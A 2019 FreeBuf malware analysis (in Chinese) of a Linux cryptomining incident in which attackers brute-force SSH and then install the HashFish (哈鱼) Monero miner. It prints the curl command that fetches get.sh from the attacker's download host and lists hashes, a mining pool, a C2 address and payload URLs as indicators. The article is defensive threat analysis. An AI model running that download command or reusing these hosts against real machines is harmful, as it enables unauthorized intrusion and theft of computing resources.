freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

哈鱼矿工攻击事件分析
2019-10-28 10:00:35

一、背景

期观测到,Linux下挖矿攻击事件,攻击者通过SSH爆破获得权限后,下载哈鱼矿工进行挖矿,对该样本进行深入分析。哈鱼矿工是一款专门为对区块链不了解的小白用户设计的挖矿软件。通过电脑的CPU和GPU计算获得虚拟货币并统一换算成比特币,用户可以将挖矿收益提现到支付宝或者选择提币到比特币钱包。

目前哈鱼矿工支持CryptoNight和Ethash算法,可用于挖门罗、以太坊等主流加密货币。此外,哈鱼矿工已率先支持门罗币新PoW算法。届时将自动无缝切换到新算法,无需人工干预。

二、样本介绍

样本基本信息:

样本 MD5 内容
get.sh 1f17b8602739864fe6f78d34330d9537 脚本下载哈鱼挖矿程序
hashfish ac74da8ea28bf2146b069e4d44d44ae0 64位挖矿管理程序
hfxminer64 337d30665c902246c45dc8c7a5d2dd4b 64位挖矿程序

三、详细分析

攻击者通过SSH爆破后,执行curl http://cli.hashfish.net/get.sh-o get.sh下载get.sh脚本,脚本内容如下所示,主要作用是根据系统版本下载对应的哈鱼挖矿程序包,并且执行挖矿程序,其中phone表示挖矿用户,mode为模式。

通过在测试环境中执行脚本分析,发现攻击者用户名为:ph_r190HVKESk13exg=,矿池为cn4.hfsvr.com:19891,进行门罗币挖矿。

哈鱼的挖矿进行名hfxminer64,下面为进程状态。

可以发现平均每秒可以执行三十几次hash运算。

三、相关IOC

MD5

1f17b8602739864fe6f78d34330d9537
ac74da8ea28bf2146b069e4d44d44ae0
337d30665c902246c45dc8c7a5d2dd4b

C2

42.88.44.188:6974

URL

http://cli.hashfish.net/get.sh
http://cli.hashfish.net/linux.tar.gz
http://cli.hashfish.net/darwin.tar.gz

附:其他平台检测结果:

微步分析结果,可以发现微步还不认为该挖矿样本为恶意程序,

Virustotal检测结果:

*本文原创作者:Sampson,本文属于FreeBuf原创奖励计划,未经许可禁止转载

# 挖矿 # 加密货币 # 哈鱼矿工
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者